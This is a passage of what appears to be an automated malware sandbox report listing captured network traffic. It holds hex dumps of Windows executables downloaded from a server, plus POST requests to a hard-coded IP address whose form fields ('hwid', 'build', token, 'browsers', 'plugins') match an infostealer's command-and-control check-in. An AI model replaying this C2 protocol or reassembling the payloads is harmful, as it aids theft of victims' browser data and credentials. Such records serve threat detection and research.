a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 11:40:35 GMTContent-Type: application/octet-streamContent-Length: 3194368Last-Modified: Mon, 11 Nov 2024 11:23:33 GMTConnection: keep-aliveETag: "6731e935-30be00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 a7 ab 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 b1 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 b1 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 67 61 76 73 6e 72 62 00 10 2a 00 00 b0 06 00 00 02 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 63 73 6a 72 65 6c 62 00 10 00 00 00 c0 30 00 00 06 00 00 00 96 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 9c 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 11:41:07 GMTContent-Type: application/octet-streamContent-Length: 3247616Last-Modified: Mon, 11 Nov 2024 11:23:12 GMTConnection: keep-aliveETag: "6731e920-318e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 a0 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 31 00 00 04 00 00 5c 5d 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 61 6f 6a 69 77 64 62 00 e0 2b 00 00 b0 05 00 00 d2 2b 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 74 71 75 7a 6d 76 77 00 10 00 00 00 90 31 00 00 04 00 00 00 68 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 31 00 00 22 00 00 00 6c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 11:41:12 GMTContent-Type: application/octet-streamContent-Length: 1820160Last-Modified: Mon, 11 Nov 2024 11:23:25 GMTConnection: keep-aliveETag: "6731e92d-1bc600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 3f ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6e 74 69 6b 64 6c 66 00 30 1a 00 00 b0 4f 00 00 2a 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 64 70 72 67 76 79 61 00 10 00 00 00 e0 69 00 00 04 00 00 00 a0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 a4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 11:41:20 GMTContent-Type: application/octet-streamContent-Length: 2774016Last-Modified: Mon, 11 Nov 2024 11:35:42 GMTConnection: keep-aliveETag: "6731ec0e-2a5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2b 00 00 04 00 00 be fd 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 6e 71 72 6e 77 77 69 00 00 2a 00 00 a0 00 00 00 f2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 69 66 65 73 71 6c 70 00 20 00 00 00 a0 2a 00 00 06 00 00 00 2c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2a 00 00 22 00 00 00 32 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 11:41:25 GMTContent-Type: application/octet-streamContent-Length: 1820160Last-Modified: Mon, 11 Nov 2024 11:23:25 GMTConnection: keep-aliveETag: "6731e92d-1bc600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 3f ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6e 74 69 6b 64 6c 66 00 30 1a 00 00 b0 4f 00 00 2a 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 64 70 72 67 76 79 61 00 10 00 00 00 e0 69 00 00 04 00 00 00 a0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 a4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1731325501370Host: self.events.data.microsoft.comContent-Length: 7974Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGIIJKEBFCBGDBAEBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 49 49 4a 4b 45 42 46 43 42 47 44 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 46 32 39 39 42 35 36 34 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 49 49 4a 4b 45 42 46 43 42 47 44 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 49 49 4a 4b 45 42 46 43 42 47 44 42 41 45 42 2d 2d 0d 0a Data Ascii: ------FHCBGIIJKEBFCBGDBAEBContent-Disposition: form-data; name="hwid"28F299B564762778904926------FHCBGIIJKEBFCBGDBAEBContent-Disposition: form-data; name="build"mars------FHCBGIIJKEBFCBGDBAEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"73bc08fadb05568b8915dc2e6e19d67a3194476a86e343d1c28236dd31583516cc368de5------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="message"browsers------BGHJJDGHCBGDHIECBGID--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 62 63 30 38 66 61 64 62 30 35 35 36 38 62 38 39 31 35 64 63 32 65 36 65 31 39 64 36 37 61 33 31 39 34 34 37 36 61 38 36 65 33 34 33 64 31 63 32 38 32 33 36 64 64 33 31 35 38 33 35 31 36 63 63 33 36 38 64 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 